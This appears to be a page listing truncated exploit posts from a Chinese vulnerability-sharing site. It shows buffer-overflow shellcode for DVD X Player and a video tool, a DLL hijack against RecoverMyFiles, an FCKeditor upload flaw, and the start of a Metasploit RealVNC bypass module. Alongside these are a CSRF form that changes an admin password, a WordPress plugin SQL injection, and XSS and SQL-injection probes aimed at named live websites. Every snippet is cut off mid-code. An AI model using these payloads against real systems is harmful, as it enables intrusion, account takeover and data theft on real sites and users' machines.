DVD X Player 5.5 Professional (.plf) Universal Buffer Overflow

$shellcode = $shellcode . "x89xe5xd9xc2xd9x75xf4x5dx55x59x49x49x49x49x43". "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34". "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41". "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x...

恢复Myfiles中3.8.4.3300的DLL劫持漏洞

# Tested on : win SP2 + SP3 Fr / Back | Track 5 fr ######################################################################## # Exploit By indoushka ------------- RecoverMyFiles.exe cdb_win32.dll ------------- #in...

FCKeditor编辑器全部版本另类上传漏洞(转)

转自Fans内二货的博客,源地址:http://honglousy.blog.sohu.com/182654619.html FCKeditor all versian Arbitrary File Upload Vulnerability 发布时间: 2011 源码地址:http://sourceforge.net/projects/fckeditor/ 漏洞作者: pentes...

京东商城存在跨站

http://www.360buy.com/djdService.aspx?skuIds=389203%2C407401%2C374280%2C&callback=jsonp1314267254816"'><body id=ssltest title=if(window.x!=1){alert(x=1)} onload=eval(ssltest.title)>

RealVNC的验证绕道

require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'RealVNC Authentication...

极瑞企业网站系统爆库

默认后台:admin/login.asp 默认数据库:database/%23zhiyuan_date_1003.mdb 官方演示站:http://www.li07.com/demo/01/ 漏洞文件:include/conn.asp 漏洞成因:无容错 漏洞利用: http://www.unhonker.com/include%5cconn.asp

曼波4.6.5 CSRF的Vuln(更改管理员密码)

ExpLo!T : <html> <head> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 1; var i=0; for(i=0; i<count; i...

WordPress的SendIt插件

[ submit.php line 27 ] $user_count = $wpdb->get_var("SELECT COUNT(*) FROM $table_email where email ='$_POST[email_add]' and id_lista = '$_POST[lista]';"); As you can see, $_POST[lista] parameter is nor validated ...

多特网多个注入漏洞

php?ztid=44+AnD+1=1">http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=1 http://www.duote.com/zhuanti/comment/index.php?ztid=44+AnD+1=2 http://db.duowan.com/zx2/eqinfo.php?id=25294

视频合并分割本地缓冲区溢出

$junk = "x41" * 1600 $ret = "x77xBDxxEBx7B" $nop = "x90" x 20 shellcode = "x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x8c". "x35xa9x3ex83xebxfcxe2xf4x70xddxedx3ex8cx35x22x7b". "xb0xbexd5x3bxf4x34x46xb5xc3x2dx22x61xa...

1...34353637

插入图片
返回顶部